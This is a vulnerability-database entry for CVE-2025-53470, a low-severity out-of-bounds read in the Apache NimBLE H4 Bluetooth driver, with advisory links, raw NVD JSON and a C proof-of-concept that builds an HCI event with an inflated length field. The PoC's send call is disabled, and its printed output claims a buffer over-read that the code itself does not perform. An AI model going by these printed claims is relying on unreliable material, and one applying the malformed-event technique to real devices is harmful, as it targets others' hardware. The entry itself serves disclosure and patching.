Security Vulnerability Report
CVE-2025-53470 CVSS 3.1 LOW

CVE-2025-53470

Published: 2026-01-10 10:15:50
Last Modified: 2026-01-14 17:38:49

Description

Out-of-bounds Read vulnerability in Apache NimBLE HCI H4 driver. Specially crafted HCI event could lead to invalid memory read in H4 driver. This issue affects Apache NimBLE: through 1.8.  This issue requires a broken or bogus Bluetooth controller and thus severity is considered low. Users are recommended to upgrade to version 1.9, which fixes the issue.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:* - VULNERABLE
Apache NimBLE < 1.8.0
Apache NimBLE 1.8.0
Apache NimBLE 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2025-53470: Apache NimBLE H4 Out-of-bounds Read
// This PoC demonstrates sending a malformed HCI event with mismatched parameter length
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// HCI Event packet header structure
typedef struct {
    uint8_t event_code;      // Event code
    uint8_t param_total_len; // Total parameter length from header
} hci_event_header_t;

// Function to simulate sending malformed HCI event to NimBLE H4 driver
void send_malformed_hci_event(int fd, uint8_t event_code, uint8_t declared_len,
                              uint8_t *actual_data, size_t actual_len)
{
    uint8_t packet[256];

    // H4 event packet type indicator
    packet[0] = 0x04; // HCI_EVENT_PKT type

    // Event header
    packet[1] = event_code;
    packet[2] = declared_len; // Declared length differs from actual

    // Copy actual data (shorter than declared length)
    if (actual_len > 0 && actual_data != NULL) {
        memcpy(&packet[3], actual_data, actual_len);
    }

    // Send packet to H4 driver (kept disabled: needs <unistd.h> and an open descriptor)
    // write(fd, packet, 3 + actual_len);
    (void)fd;

    printf("[+] Sending malformed HCI event: code=0x%02x, declared_len=%d, actual_len=%zu\n",
           event_code, declared_len, actual_len);
    printf("[+] This will trigger out-of-bounds read in NimBLE H4 driver\n");
}

int main(void)
{
    printf("=== CVE-2025-53470 PoC ===\n");
    printf("Target: Apache NimBLE < 1.9 HCI H4 Driver\n");
    printf("Vulnerability: Out-of-bounds Read via malformed HCI event\n\n");

    // Example 1: Event with declared length > actual data
    uint8_t event_data[] = {0x01, 0x02}; // Only 2 bytes of actual data
    send_malformed_hci_event(0, 0xFF, 20, event_data, sizeof(event_data)); // Declare 20 bytes

    // The H4 driver will attempt to read 20 bytes starting from packet[3],
    // but only 2 bytes are available, causing OOB read
    printf("\n[+] Attack vector: Malicious Bluetooth controller sends HCI event\n");
    // sizeof() yields size_t, so the format specifier must be %zu, not %d
    printf("[+] Result: Driver reads %zu bytes beyond allocated buffer\n",
           20 - sizeof(event_data));
    printf("[+] Impact: Potential information disclosure or crash\n");

    return 0;
}

References

https://github.com/apache/mynewt-nimble/commit/b973df0c6cf7b30efbf8eb2cafdc1ee843464b76 (Patch)
https://lists.apache.org/thread/32sm0944dyod4sdql77stgyw9xb2msc0 (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/01/08/2 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53470", "sourceIdentifier": "[email protected]", "published": "2026-01-10T10:15:50.493", "lastModified": "2026-01-14T17:38:48.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds Read vulnerability in Apache NimBLE HCI H4 driver. Specially crafted HCI event could lead to invalid memory read in H4 driver.\n\nThis issue affects Apache NimBLE: through 1.8. \n\nThis issue requires a broken or bogus Bluetooth controller and thus severity is considered low.\n\nUsers are recommended to upgrade to version 1.9, which fixes the issue."}, {"lang": "es", "value": "Vulnerabilidad de lectura fuera de límites en el controlador HCI H4 de Apache NimBLE. Un evento HCI especialmente diseñado podría conducir a una lectura de memoria no válida en el controlador H4.\n\nEste problema afecta a Apache NimBLE: hasta la versión 1.8.\n\nEste problema requiere un controlador Bluetooth defectuoso o falso y, por lo tanto, la severidad se considera baja.\n\nSe recomienda a los usuarios actualizar a la versión 1.9, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.0", "matchCriteriaId": "DC033019-AA62-465E-AD0A-8018D8C89ED3"}]}]}], 
"references": [{"url": "https://github.com/apache/mynewt-nimble/commit/b973df0c6cf7b30efbf8eb2cafdc1ee843464b76", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://lists.apache.org/thread/32sm0944dyod4sdql77stgyw9xb2msc0", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/08/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}